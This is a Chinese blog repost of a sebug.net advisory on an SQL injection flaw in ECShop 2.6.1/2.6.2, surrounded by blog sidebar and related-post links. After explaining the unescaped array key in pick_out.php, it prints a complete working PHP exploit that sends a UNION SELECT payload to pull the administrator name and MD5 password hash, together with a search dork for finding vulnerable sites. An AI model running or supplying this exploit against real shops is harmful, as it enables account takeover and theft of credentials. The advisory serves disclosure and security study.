ECSHOP 2.6.1/2.6.2
- 浏览: 607965 次
- 性别:
- 来自: 北京
文章分类
最新评论
-
kangh:
转载的也拿出来 都不试一下 完全错误
Nginx+ffmpeg的HLS开源服务器搭建配置及开发详解 -
wangtxlz:
#cd builders/cmake#cmake .系统提示命 ...
crtmpserver流媒体服务器的介绍与搭建 -
hnraysir:
支持支持支持
手机Android音视频采集与直播推送,实现单兵、移动监控类应用 -
wuent:
把web服务器和php框架绑定到一起?真不建议这样。。。
Swoole(PHP高级Web开发框架) -
wuent:
有更详细的性能比较吗?php,python,java
PHP中的(伪)多线程与多进程
SSV-ID: 11412
SSV-Appdir: ECSHOP
发布时间: 2009-05-25
影响版本:
漏洞描述:
文件includes/init.php判断get_magic_quotes_gpc(),如果为off则调用addslashes_deep(): 1. // includes/init.php 2. if (!get_magic_quotes_gpc()) 3. { 4. if (!emptyempty($_GET)) 5. { 6. $_GET = addslashes_deep($_GET); 7. } 8. if (!emptyempty($_POST)) 9. { 10. $_POST = addslashes_deep($_POST); 11. } 12. 13. $_COOKIE = addslashes_deep($_COOKIE); 14. $_REQUEST = addslashes_deep($_REQUEST); 15. } addslashes_deep()在文件includes/lib_base.php里最后通过addslashes()处理 1. // includes/lib_base.php 2. function addslashes_deep($value) 3. { 4. if (emptyempty($value)) 5. { 6. return $value; 7. } 8. else 9. { 10. return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value); 11. // 只处理了数组的值:) 12. } 13. } 下面看下具体的导致漏洞的代码,文件 pick_out.php里: 1. // pick_out.php 2. if (!emptyempty($_GET['attr'])) 3. { 4. foreach($_GET['attr'] as $key => $value) 5. { 6. $key = intval($key); 7. $_GET['attr'][$key] = htmlspecialchars($value); 8. // foreach处理的是指定数组的拷贝,所以这里的处理并不影响数组原先的key和value 9. // 因此可以引入任意的key:) 10. // 程序员的逻辑出了问题? 11. } 12. } 13. ... 14. foreach ($_GET['attr'] AS $key => $value) 15. { 16. $attr_url .= '&attr[' . $key . ']=' . $value; 17. 18. $attr_picks[] = $key; 19. if ($i > 0) 20. { 21. if (emptyempty($goods_result)) 22. { 23. break; 24. } 25. // 利用key进行注射:) 26. $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attrvalue='$value'"); 由于magic_quotes_gpc=off时没有对$key处理,同时在数组赋值时存在逻辑问题,最终导致了注射漏洞.
测试方法:
[sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1. #!/usr/bin/php 2. <?php 3. //本程序只作技术交流,请不要用做非法用途!! 4. print_r(' 5. +---------------------------------------------------------------------------+ 6. ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit 7. by puret_t 8. mail: puretot at gmail dot com 9. team: http://bbs.wolvez.org 10. dork: "Powered by ECShop" 11. +---------------------------------------------------------------------------+ 12. '); 13. /** 14. * works with magic_quotes_gpc = Off 15. */ 16. if ($argc < 3) { 17. print_r(' 18. +---------------------------------------------------------------------------+ 19. Usage: php '.$argv[0].' host path 20. host: target server (ip/hostname) 21. path: path to ecshop 22. Example: 23. php '.$argv[0].' localhost /ecshop/ 24. +---------------------------------------------------------------------------+ 25. '); 26. exit; 27. } 28. 29. error_reporting(7); 30. ini_set('max_execution_time', 0); 31. 32. $host = $argv[1]; 33. $path = $argv[2]; 34. 35. $resp = send(); 36. preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash); 37. 38. if ($hash) 39. exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n"); 40. else 41. exit("Exploit Failed!\n"); 42. 43. function send() 44. { 45. global $host, $path; 46. 47. $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat'; 48. 49. $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n"; 50. $data .= "Host: $host\r\n"; 51. $data .= "Connection: Close\r\n\r\n"; 52. 53. $fp = fsockopen($host, 80); 54. fputs($fp, $data); 55. 56. $resp = ''; 57. 58. while ($fp && !feof($fp)) 59. $resp .= fread($fp, 1024); 60. 61. return $resp; 62. } 63. 64. ?>
发表评论
-
nginx、php-fpm默认配置与性能–TCP socket还是unix domain socket
2015-04-02 11:14 1468前几天看到一篇博客,提到php所在服务器在大并发情况下,频 ... -
使用socket方式连接Nginx优化php-fpm性能
2015-04-01 13:49 0Nginx连接fastcgi的方式有 ... -
PHP中include和require的区别详解
2015-04-01 08:32 01、概要 require()语句的性能与includ ... -
PHP 中cookie 和 session 的分析
2015-03-31 12:33 0HP 中cookie 和session 的分析 ... -
php 经典的算法题你懂的
2015-03-31 12:31 0有5个人偷了一堆苹果,准备在第二天分赃。晚上,有一人遛出来, ... -
PHP最常用的2种设计模式工厂模式和单例模式介绍
2015-03-31 12:26 0简单来说,PHP单例模式就是一个功能用一个类来实现,并且在整 ... -
PHP 数据类型
2015-03-31 12:23 0PHP 数据类型 PHP 支持八种原始类型(type)。 ... -
PHP mcrypt启用、加密以及解密过程详解
2015-03-30 11:32 1457Mcrypt扩展库可以实现加密解密功能,就是既能将明文加密, ... -
PHP扩展实现类扩展
2015-03-27 14:08 573在第一篇文章中,我们所开发的扩展是单个函数,本篇文章看一下 ... -
PHP高级工程师的面试题
2015-03-06 10:35 01. 基本知识点 HTTP协议中几个状态码的含义:1x ... -
PHP面试中常见的面试试题与算法例子
2015-03-05 14:14 0下面是四道比较常见的题目,主要考察的是对字符串函数以及文件操 ... -
PHP实现四种常用的排序算法
2015-03-05 14:09 0插入排序(Insertion Sort),选择排序(Sele ... -
用swagger-php/ui做API测试
2015-02-13 09:46 3643功能: 1 swagger-php根据自定义的规则生成API ... -
app后端设计(0)--总目录
2015-01-23 18:03 0做了3年app相关的系统架构,api设计,先后在3个创业公司中 ... -
PHP中eAccelerator、memcached、xcache、APC 4个加速、缓存扩展的区别
2015-01-23 10:26 912这篇文章主要介绍了PHP ... -
PHP内核探索:zend_parse_parameters函数
2015-01-16 14:14 961最简单的获取函数调用者传递过来的参数便是使用zend_pars ... -
实战:用C写php扩展(二)
2015-01-16 11:05 996一、前言 在我的上一篇文章“实战:用C写php扩展(一)”里介 ... -
实战:用C写php扩展(一)
2015-01-16 11:04 10151、 前言 首先,确保你的机器安装了apache和php。假 ... -
JavaScript or PHP 来检测移动设备
2014-09-22 10:04 625iPhone & iPod Detection T ... -
YII Framework学习教程-YII的Modules(模块化)
2014-08-27 11:04 751一个相对来说大的项目。如果按照yii生成的 ...
相关推荐
ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞;ecshop的后台编辑文件/admin/affiliate_ck.php中,对输入参数auid未进行正确类型转义,导致整型注入的发生;ecshop的后台编辑文件/admin/...
然而,像许多其他软件一样,ECShop也存在安全漏洞,其中一种是SQL注入漏洞。这个"ECShop 注射漏洞利用工具"显然就是为了检测和利用此类漏洞而设计的。 SQL注入是一种常见的网络安全攻击手法,攻击者通过在输入字段...
礼包不能购买5、邮件杂志中添加插入图片插入相对路径导致发送邮件图片无法显示6、Search.php页面过滤不严导致SQL注入漏洞以及后台开店向导会产生的漏洞7、flow文件过滤不严8、前台用户越权操作9、礼包id未过滤10、...
"ecshop_2_7_2_flow_sql_inj.exe"这个文件可能是一个用于检测和利用ECSHOP 2.7.2版本SQL注入漏洞的工具。它可能是由安全研究人员或者黑客创建的,用于测试系统的脆弱性。这类工具通常会模拟恶意用户的输入,尝试执行...
3. ECShop 后台过滤不严可获取 shell:攻击者可以通过该漏洞获取 shell 权限。 4. FengCMS app/model/dbmanageModel.php 任意文件删除漏洞:攻击者可以通过该漏洞删除任意文件。 5. FengCMS app/model/messageModel....
本次介绍的是ECSHOP中的一个全版本SQL注入漏洞(0day),该漏洞可能允许攻击者通过构造恶意请求,获取数据库中的敏感信息,进而对网站进行进一步的攻击。 #### 关键概念解析 1. **SQL注入**:是一种常见的Web应用...
6. **安全防护**:SQL注入是常见的攻击手段,ECShop会使用预处理语句或参数化查询来防止此类攻击。同时,对用户输入进行验证和清理也是必要的安全措施。 7. **数据库备份与恢复**:为了防止数据丢失,定期备份...
这个漏洞可能出现在系统的初始化阶段,即当用户首次安装或设置ECSHOP时,由于代码逻辑错误或权限设置不当,可能导致攻击者在未经授权的情况下获取系统控制权,严重威胁到商家的数据安全和用户隐私。 描述简单明了,...
- SQL注入攻击:学习如何利用输入验证不严的漏洞执行恶意SQL语句,以及如何防止此类攻击。 - XSS攻击:了解如何通过网页注入脚本代码来窃取用户信息,以及设置过滤规则和HTTP头部策略来防止XSS攻击。 - DDoS攻击:...
标题中的“ecshop源码分析——用cookie缓存sql语句”揭示了本文将探讨的是电商系统ECSHOP在优化数据库查询性能方面的一个实践,即利用Cookie来缓存SQL语句。ECSHOP是一款基于PHP开发的开源电商解决方案,它的性能...
9. **安全性**:作为一款成熟的电商系统,ECShop重视安全防护,通过数据加密、防SQL注入等手段保护商家和用户的数据安全。 10. **升级与维护**:随着技术的更新和市场需求的变化,ECShop会定期发布新版本,如2.7.2...
ECshop漏洞利用工具 专门挖掘ECshop漏洞利用工具的漏洞,所以很好很强大的哦
[修正] 修正gbk手机发送错误 [修正] 修正category页面过滤不严导致SQL注入漏洞 [修正] 修正关闭库存管理且库存不足, 礼包不能购买 [修正] 修正邮件杂志中添加插入图片插入相对路径导致发送邮件图片无法显示 [修正] ...
2. **XSS跨站脚本**:XSS攻击是利用网站应用程序对用户输入的数据处理不严,将恶意脚本插入到网页中,当其他用户访问这些页面时,恶意脚本被执行,可能导致会话劫持、个人信息窃取等。 3. **文件上传漏洞**:如果...
然而,由于其开源性质,使得系统在设计或实现过程中可能会存在某些未被充分考虑的漏洞,这些漏洞一旦被恶意利用,可能会导致数据泄露、系统被控制等严重后果。 #### 漏洞代码分析 提供的代码片段是针对ECShop中的`...
ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 ECShop悉心听取每一位商家的需求与建议...
ECSHOP注重数据安全,提供了防SQL注入、XSS跨站脚本攻击等防护措施,保护商家和客户的敏感信息。 7. **售后服务** Comsenz公司通常为ECSHOP用户提供技术支持和售后服务,包括论坛讨论、在线问答、付费技术支持等...
ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。...在特定条件下的SQL注入漏洞
### ecshop系统结构详解 #### 一、文件夹功能说明 **ecshop**是一款非常流行的开源电子商务系统,其系统架构清晰、易于维护和扩展。下面详细介绍ecshop的各个主要文件夹及其功能: 1. **根目录**:包含了前台程序...